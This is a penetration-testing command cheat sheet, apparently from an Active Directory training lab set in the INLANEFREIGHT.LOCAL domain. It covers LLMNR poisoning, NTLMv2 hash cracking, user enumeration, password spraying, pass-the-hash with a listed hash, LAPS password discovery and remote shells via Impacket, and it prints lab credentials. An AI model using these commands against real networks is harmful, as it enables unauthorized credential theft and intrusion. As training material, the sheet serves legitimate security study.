| Command | Description |
|---|---|
| `nslookup ns1.inlanefreight.com` | Used to query the Domain Name System and discover the IP address to domain name mapping of the target entered. Performed from a Linux-based host. |
| `sudo tcpdump -i ens224` | Used to start capturing network packets on the network interface given after the `-i` option. Performed from a Linux-based host. |
| `sudo responder -I ens224 -A` | Used to start responding to and analyzing LLMNR, NBT-NS and mDNS queries on the interface given after the `-I` option, operating in Passive Analysis mode, which is activated with `-A`. Performed from a Linux-based host. |
| `fping -asgq 172.16.5.0/23` | Performs a ping sweep on the specified network segment. Performed from a Linux-based host. |
| `sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum` | Performs an nmap scan with OS detection, version detection, script scanning and traceroute enabled (`-A`) against the list of hosts in the file given after `-iL` (`hosts.txt`), then writes the scan results to the file given after the `-oN` option. Performed from a Linux-based host. |
| `sudo git clone https://github.com/ropnop/kerbrute.git` | Uses git to clone the Kerbrute tool. Performed from a Linux-based host. |
| `make help` | Used to list the compile options available with `make`. Performed from a Linux-based host. |
| `sudo make all` | Used to compile Kerbrute binaries for multiple OS platforms and CPU architectures. |
| `./kerbrute_linux_amd64` | Used to test the chosen compiled Kerbrute binary. Performed from a Linux-based host. |
| `sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute` | Used to move the Kerbrute binary to a directory that is in a Linux user's PATH, making the tool easier to use. |
| `./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results` | Runs Kerbrute to discover usernames in the domain given after the `-d` option (`INLANEFREIGHT.LOCAL`) via the domain controller given after `--dc`, using a wordlist (`jsmith.txt`), and writes (`-o`) the results to the specified file. Performed from a Linux-based host. |
| Command | Description |
|---|---|
| `responder -h` | Used to display the usage instructions and the various options available in Responder. Performed from a Linux-based host. |
| `hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt` | Uses hashcat to crack NTLMv2 hashes (hash mode `-m 5600`) that were captured by Responder and saved in a file (`forend_ntlmv2`). The cracking is done using the specified wordlist. |
| `Import-Module .\Inveigh.ps1` | Uses the `Import-Module` PowerShell cmdlet to import the Windows-based tool Inveigh.ps1. |
| `(Get-Command Invoke-Inveigh).Parameters` | Used to output many of the options and functionality available with `Invoke-Inveigh`. Performed from a Windows-based host. |
| `Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y` | Starts Inveigh on a Windows-based host with LLMNR and NBNS spoofing enabled and outputs the results to a file. |
| `.\Inveigh.exe` | Starts the C# implementation of Inveigh from a Windows-based host. |
| `$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"; Get-ChildItem $regkey \| foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose }` | PowerShell script used to disable NBT-NS on every network interface of a Windows host. |
| Command | Description |
|---|---|
| `for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done` | Bash script (shown here as a one-liner) used to generate 16,079,616 possible username combinations. Performed from a Linux-based host. |
| `crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol` | Uses CrackMapExec and valid credentials (`avazquez:Password123`) to enumerate the password policy (`--pass-pol`). Performed from a Linux-based host. |
| `rpcclient -U "" -N 172.16.5.5` | Uses rpcclient to discover information about the domain through an SMB NULL session. Performed from a Linux-based host. |
| `rpcclient $> querydominfo` | Uses rpcclient to enumerate the password policy in a target Windows domain. Performed from a Linux-based host. |
| `enum4linux -P 172.16.5.5` | Uses enum4linux to enumerate the password policy (`-P`) in a target Windows domain. Performed from a Linux-based host. |
| `enum4linux-ng -P 172.16.5.5 -oA ilfreight` | Uses enum4linux-ng to enumerate the password policy (`-P`) in a target Windows domain, then saves the output as YAML and JSON files named with the prefix given after the `-oA` option. Performed from a Linux-based host. |
| `ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" \| grep -m 1 -B 10 pwdHistoryLength` | Uses ldapsearch to enumerate the password policy in a target Windows domain. Performed from a Linux-based host. |
| `net accounts` | Used to enumerate the password policy in a Windows domain. Performed from a Windows-based host. |
| `Import-Module .\PowerView.ps1` | Uses the `Import-Module` cmdlet to import the PowerView.ps1 tool. Performed from a Windows-based host. |
| `Get-DomainPolicy` | Used to enumerate the password policy in a target Windows domain. Performed from a Windows-based host. |
| `enum4linux -U 172.16.5.5 \| grep "user:" \| cut -f2 -d"[" \| cut -f1 -d"]"` | Uses enum4linux to discover user accounts in a target Windows domain, then uses grep and cut to filter the output down to just the usernames. Performed from a Linux-based host. |
| `rpcclient -U "" -N 172.16.5.5` then `rpcclient $> enumdomusers` | Uses rpcclient over an SMB NULL session to discover user accounts in a target Windows domain. Performed from a Linux-based host. |
| `crackmapexec smb 172.16.5.5 --users` | Uses CrackMapExec to discover users (`--users`) in a target Windows domain. Performed from a Linux-based host. |
| `ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" \| grep sAMAccountName: \| cut -f2 -d" "` | Uses ldapsearch to discover users in a target Windows domain, then filters the output with grep and cut to show only the `sAMAccountName` values. Performed from a Linux-based host. |
| `./windapsearch.py --dc-ip 172.16.5.5 -u "" -U` | Uses the Python tool windapsearch.py to discover users in a target Windows domain. Performed from a Linux-based host. |
| `for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 \| grep Authority; done` | Bash one-liner used to perform a password spraying attack using rpcclient and a list of users (`valid_users.txt`). The grep filters out failed attempts to keep the output clean. Performed from a Linux-based host. |
| `kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1` | Uses Kerbrute and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 \| grep +` | Uses CrackMapExec and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain. The grep filters out logon failures. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123` | Uses CrackMapExec to validate a set of credentials. Performed from a Linux-based host. |
| `sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf \| grep +` | Uses CrackMapExec with the `--local-auth` flag to ensure only one login attempt is performed per host, so that accounts are not locked out by the enforced password policy. The grep filters out logon failures. Performed from a Linux-based host. |
| `Import-Module .\DomainPasswordSpray.ps1` | Used to import the PowerShell-based tool DomainPasswordSpray.ps1. Performed from a Windows-based host. |
| `Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue` | Performs a password spraying attack and writes (`-OutFile`) the results to the specified file (`spray_success`). Performed from a Windows-based host. |
| Command | Description |
|---|---|
| `Get-MpComputerStatus` | PowerShell cmdlet used to check the status of Windows Defender Antivirus. Performed from a Windows-based host. |
| `Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections` | PowerShell cmdlet used to view the effective AppLocker policy. Performed from a Windows-based host. |
| `$ExecutionContext.SessionState.LanguageMode` | PowerShell expression used to discover the PowerShell Language Mode in use on a Windows-based host. Performed from a Windows-based host. |
| `Find-LAPSDelegatedGroups` | A LAPSToolkit function that discovers LAPS delegated groups. Performed from a Windows-based host. |
| `Find-AdmPwdExtendedRights` | A LAPSToolkit function that checks the rights on each computer with LAPS enabled for any groups with read access and users with All Extended Rights. Performed from a Windows-based host. |
| `Get-LAPSComputers` | A LAPSToolkit function that searches for computers that have LAPS enabled, discovers password expiration times and can discover the randomized passwords. Performed from a Windows-based host. |
| Command | Description |
|---|---|
| `xfreerdp /u:forend@inlanefreight.local /p:Klmcargo2 /v:172.16.5.25` | Connects to a Windows target over RDP using valid credentials. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users` | Authenticates to a Windows target over SMB using valid credentials and attempts to discover more users (`--users`) in the target Windows domain. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups` | Authenticates to a Windows target over SMB using valid credentials and attempts to discover groups (`--groups`) in the target Windows domain. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users` | Authenticates to a Windows target over SMB using valid credentials and attempts to list the logged-on users (`--loggedon-users`) on the target Windows host. Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares` | Authenticates to a Windows target over SMB using valid credentials and attempts to discover any SMB shares (`--shares`). Performed from a Linux-based host. |
| `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share` | Authenticates to a Windows target over SMB using valid credentials and uses the CrackMapExec module (`-M`) `spider_plus` to crawl the specified readable share (`Dev-share`) and list all readable files. The results are output in JSON. Performed from a Linux-based host. |
| `smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5` | Enumerates the target Windows host (`-H`) using valid credentials and lists the shares and the permissions available on each within the context of those credentials. Performed from a Linux-based host. |
| `smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only` | Enumerates the target Windows host using valid credentials and performs a recursive listing (`-R`) of the specified share (`SYSVOL`), outputting only the directories (`--dir-only`) in the share. Performed from a Linux-based host. |
| `rpcclient $> queryuser 0x457` | Enumerates a target user account in a Windows domain using its relative identifier (`0x457`). Performed from a Linux-based host. |
| `rpcclient $> enumdomusers` | Discovers user accounts in a target Windows domain and their associated relative identifiers (RIDs). Performed from a Linux-based host. |
| `psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125` | Impacket tool used to connect to the CLI of a Windows target via the `ADMIN$` administrative share with valid credentials. Performed from a Linux-based host. |
| `wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5` | Impacket tool used to connect to the CLI of a Windows target via WMI with valid credentials. Performed from a Linux-based host. |
| `windapsearch.py -h` | Used to display the options and functionality of windapsearch.py. Performed from a Linux-based host. |
| `python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 --da` | Used to enumerate the Domain Admins group (`--da`) in a target Windows domain using a valid set of credentials. Performed from a Linux-based host. |
| `python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 -PU` | Used to perform a recursive search (`-PU`) for users with nested permissions using valid credentials. Performed from a Linux-based host. |
| `sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all` | Executes the Python implementation of BloodHound (bloodhound.py) with valid credentials, specifying a name server (`-ns`) and the target Windows domain (`inlanefreight.local`), and runs all collection methods (`-c all`). Performed from a Linux-based host. |
| Command | Description |
|---|---|
| `Get-Module` | PowerShell cmdlet used to list all loaded modules, their versions and the commands they export. Performed from a Windows-based host. |
| `Import-Module ActiveDirectory` | Loads the Active Directory PowerShell module. Performed from a Windows-based host. |
| `Get-ADDomain` | PowerShell cmdlet used to gather Windows domain information. Performed from a Windows-based host. |
| `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName` | PowerShell cmdlet used to enumerate user accounts in a target Windows domain, filtered to those with a `ServicePrincipalName` set. Performed from a Windows-based host. |
| `Get-ADTrust -Filter *` | PowerShell cmdlet used to enumerate all trust relationships (`-Filter *`) in a target Windows domain. Performed from a Windows-based host. |
| `Get-ADGroup -Filter * \| select name` | PowerShell cmdlet used to enumerate all groups in a target Windows domain, showing only the group names (`select name`). Performed from a Windows-based host. |
| `Get-ADGroup -Identity "Backup Operators"` | PowerShell cmdlet used to search for a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host. |
| `Get-ADGroupMember -Identity "Backup Operators"` | PowerShell cmdlet used to discover the members of a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host. |
| `Export-PowerViewCSV` | PowerView function used to append results to a CSV file. Performed from a Windows-based host. |
| `ConvertTo-SID` | PowerView function used to convert a user or group name to its SID. Performed from a Windows-based host. |
| `Get-DomainSPNTicket` | PowerView function used to request the Kerberos ticket for a specified service principal name (SPN). Performed from a Windows-based host. |
| `Get-Domain` | PowerView function used to return the AD object for the current (or specified) domain. Performed from a Windows-based host. |
| `Get-DomainController` | PowerView function used to return a list of the domain controllers for the specified target domain. Performed from a Windows-based host. |
| `Get-DomainUser` | PowerView function used to return all users or specific user objects in AD. Performed from a Windows-based host. |
| `Get-DomainComputer` | PowerView function used to return all computers or specific computer objects in AD. Performed from a Windows-based host. |
| `Get-DomainGroup` | PowerView function used to return all groups or specific group objects in AD. Performed from a Windows-based host. |
| `Get-DomainOU` | PowerView function used to search for all or specific OU objects in AD. Performed from a Windows-based host. |
| `Find-InterestingDomainAcl` | PowerView function used to find object ACLs in the domain with modification rights granted to non-built-in objects. Performed from a Windows-based host. |
| `Get-DomainGroupMember` | PowerView function used to return the members of a specific domain group. Performed from a Windows-based host. |
| `Get-DomainFileServer` | PowerView function used to return a list of servers likely functioning as file servers. Performed from a Windows-based host. |
| `Get-DomainDFSShare` | PowerView function used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host. |
| `Get-DomainGPO` | PowerView function used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host. |
| `Get-DomainPolicy` | PowerView function used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host. |
| `Get-NetLocalGroup` | PowerView function used to enumerate local groups on a local or remote machine. Performed from a Windows-based host. |